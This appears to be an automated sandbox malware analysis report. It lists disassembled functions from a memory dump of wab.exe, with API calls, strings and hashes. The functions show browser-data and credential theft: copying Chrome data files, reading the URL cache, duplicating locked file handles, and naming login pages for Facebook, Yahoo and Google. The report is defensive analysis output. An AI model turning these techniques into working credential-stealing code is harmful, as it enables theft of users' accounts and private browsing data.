                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                    Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                    • String ID: $/deleteregkey$/savelangfile
                    • API String ID: 2744995895-28296030
                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                    Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                    • wcsrchr.MSVCRT ref: 0040B738
                    • memset.MSVCRT ref: 0040B756
                    • memset.MSVCRT ref: 0040B7F5
                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                    • memset.MSVCRT ref: 0040B851
                    • memset.MSVCRT ref: 0040B8CA
                    • memcmp.MSVCRT ref: 0040B9BF
                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                    • memset.MSVCRT ref: 0040BB53
                    • memcpy.MSVCRT ref: 0040BB66
                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                    • String ID: chp$v10
                    • API String ID: 170802307-2783969131
                    • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                    • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                    Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 555 40e3c3-40e3c6 550->555 551->552 553 40e416-40e427 memcpy 552->553 554 40e42a-40e42f 552->554 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                    APIs
                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                    • memset.MSVCRT ref: 0040E380
                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                    • wcschr.MSVCRT ref: 0040E3B8
                    • memcpy.MSVCRT ref: 0040E3EC
                    • memcpy.MSVCRT ref: 0040E407
                    • memcpy.MSVCRT ref: 0040E422
                    • memcpy.MSVCRT ref: 0040E43D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                    • API String ID: 3073804840-2252543386
                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                    • String ID:
                    • API String ID: 3715365532-3916222277
                    • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                    • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                    • CloseHandle.KERNEL32(?), ref: 0040E148
                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                    • String ID: bhv
                    • API String ID: 327780389-2689659898
                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                    Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                    • API String ID: 2941347001-70141382
                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                    Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                    • String ID:
                    • API String ID: 2827331108-0
                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                    Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040C298
                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                    • wcschr.MSVCRT ref: 0040C324
                    • wcschr.MSVCRT ref: 0040C344
                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                    • GetLastError.KERNEL32 ref: 0040C373
                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                    • String ID: visited:
                    • API String ID: 1157525455-1702587658
                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                    APIs
                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                    • memset.MSVCRT ref: 0040E1BD
                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                    • _snwprintf.MSVCRT ref: 0040E257
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                    • API String ID: 3883404497-2982631422
                    • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                    • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                    Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                    • memset.MSVCRT ref: 0040BC75
                    • memset.MSVCRT ref: 0040BC8C
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                    • memcmp.MSVCRT ref: 0040BCD6
                    • memcpy.MSVCRT ref: 0040BD2B
                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                    • String ID:
                    • API String ID: 509814883-3916222277
                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                    Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                    APIs
                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                    • GetLastError.KERNEL32 ref: 0041847E
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile$??3@ErrorLast
                    • String ID: |A
                    • API String ID: 1407640353-1717621600
                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                    Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                    • String ID: r!A
                    • API String ID: 2791114272-628097481
                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                    Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                    • _wcslwr.MSVCRT ref: 0040C817
                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                    • wcslen.MSVCRT ref: 0040C82C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                    • API String ID: 62308376-4196376884
